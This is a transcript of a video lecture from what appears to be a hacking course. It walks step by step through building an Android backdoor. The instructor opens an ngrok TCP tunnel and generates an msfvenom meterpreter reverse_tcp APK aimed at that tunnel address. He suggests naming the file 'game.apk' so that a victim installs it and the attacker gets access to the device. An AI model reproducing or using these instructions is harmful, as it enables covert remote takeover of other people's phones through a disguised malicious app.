Hi! Within this lecture, we are going to be finally ready to create our backdoor for Android devices using these tunneling services. So if you go to documentation of this ngrok.com, you will see a lot of usages and a lot of comments that you can use, you can leverage in your own environment. As you can see, in order to create some kind of connection, all you have to do is just specify the connection type and the connection port that you want to use. I'm going to show you what you can do or what you have to do in order to make this work. Don't worry, but if you want to use ngrok for some other special occasions later on, make sure you read this documentation because it's very useful actually. For example, in here, they are trying to expose a web server on port 80 of your local machine to the internet, and that is what we have seen in the previous lecture when we tried to start the web service of Apache. But that's not what we're going to do right now. We're going to use this for sending the connection from the Android to the ngrok. So in order to do that, of course, we're going to use the same thing. I'm in my downloads folder one more time in my terminal, and I'm writing /ngrok TCP and a port number. So maybe you can think something like that. Yeah, you're talking about ports a lot of times during this training, but you didn't explain what a port is, and you're correct. So we are sending some requests and getting responses when we deal with internet operations in our daily life. So every connection, like going to google.com or receiving that connection from Android phone, requires some sort of a gate, some sort of a port to be processed on. So every connection uses its own specified gate, like 80 for HTTP requests, or I don't know, 22 for SSH requests. And for mail requests, we have a lot of different ports. For some kind of other special services or special connections, we have other ports. So we have some respective gates, respective ports for different kind of connections. And firewalls actually try to observe these gates, observe these ports, so that they won't be left open for any kind of incoming malicious connection. Okay, so we're going to use a port that no one else is using, something like 4242 or any other thing like 5555. And if it doesn't work for you for some reason, you may choose to use another port. For example, I'm going to write 4242 over here, and since we do not have any kind of firewall in our Kali Linux, it should work fine. So I'm going to hit enter, and as you can see, it started to work. And we're not going to come across with kind of firewalls in Android as well. So most of the time, this 4242 will work out for you. But if it doesn't, just try 5555 or 6666. Okay? So as you can see, it's now started, and it's some kind of doing a forwarding operation, which is what we are looking for. As you can see, we are forwarding this tcp.ngrok.io with this port to our local host. So this address and this port would be different for you, maybe different for you. I have 197 over here, and in the local host, of course, we have our specified port over here, like 4242. But this will change for you. But we're going to use this. So I'm going to use this as a local host and a local port in my MSF Venom. Because why? Because remember, we want to direct the connection from the Android phone to the ngrok. and then later on from the ngrok to our own local host, to our own Kali Linux machine using this service. So that is exactly what we are doing right now. So what I'm going to do, I'm going to give this as an input to lhost and give the port as an input to the L port in my MSF Venom. So you have to do exactly the same in order to succeed. So this would be different for you. Even the address would be different for you. So make sure you copy your own, not mine. So over here, I'm going to use this and I'm going to use 1797 as a port. And this will receive the information and forward it to me once it comes. So don't close this down, just open a new tab from the file and say new tab, okay? Because if you close it down, the service will stop. So open a new tab and write the MSF Venom code command that we have written before. So as a payload parameter, I'm going to specify Android, meterpreter, and then reverse TCP, okay? The reverse underscore TCP, and then later on we have to specify the lhost and say equal to, and this will be equal to the 0.tcp.ngrok.io, I believe, and the L port will be 17,197. So I'm just going to copy and paste those. 0 TCP ngrok.io. So it's easy, I can write that without forgetting. I suppose 0.tcp.ngrok.io. And then L port will be, so 17, let me see it, yeah, 17,197, so 17,197. Here we go. Now we are okay. And then we specify where to put this payload, where to put this APK file that we have been trying to create. In order to do that, you can just write the results like -r and specify the folder that you want to put it so that you can access it easily and you can forward it. So I'm going to say R, okay, with a capital R, and say this greater sign. It means that just write the result into this folder, into this location, okay? So R greater than /root/ downloads or documents or any other folder that you may want to put this. So I'm going to say ngrok.test apk and I'm going to put it inside of my root folder directly. Of course, you're more than welcome to use another name for your APK, but don't forget to specify .apk extension at the end of this. I'm just going to call this test because we're testing it, okay? In real life example, it would be something like game.apk or I don't know, super cool application.apk because you're going to send it to victim next. So here you go. I believe it's now created for us. Let me minimize this and let me go to root folder. And here we go. We see the ngrok test.apk. So this is the exact file that we are going to send to the victim, and once the victim installs this, we're going to get access to their own device. Let's do that in the next lecture.